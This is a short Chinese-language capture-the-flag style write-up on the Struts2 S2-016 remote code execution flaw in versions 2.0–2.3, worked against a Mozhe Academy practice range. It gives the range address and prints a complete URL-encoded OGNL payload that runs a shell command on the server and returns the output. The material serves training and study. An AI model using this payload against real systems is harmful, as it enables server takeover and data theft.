漏洞描述及影响版本

近期Struts2被曝重要漏洞，此漏洞影响struts2.0-struts2.3所有版本，可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、*居多.

以墨者学院为例

靶场链接：http://219.153.49.228:49386

先找出后缀为action的网页，发现http://219.153.49.228:49386/index.action存在，测试漏洞是否存在，可以使用Struts2漏洞检查工具来测试

 发现存在Struts2 （s2-016）漏洞，直接使用工具可进行命令执行，直接查看key.txt即可

 或者使用payload进行命令执行：

http://192.168.34.153/index.action?redirect:%24%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%27ls%27%2c%27%2f%27%7d)).start()%2c%23b%3d%23a.getInputStream()%2c%23c%3dnew+java.io.InputStreamReader(%23b)%2c%23d%3dnew+java.io.BufferedReader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23matt.getWriter().println(%23e)%2c%23matt.getWriter().flush()%2c%23matt.getWriter().close()%7d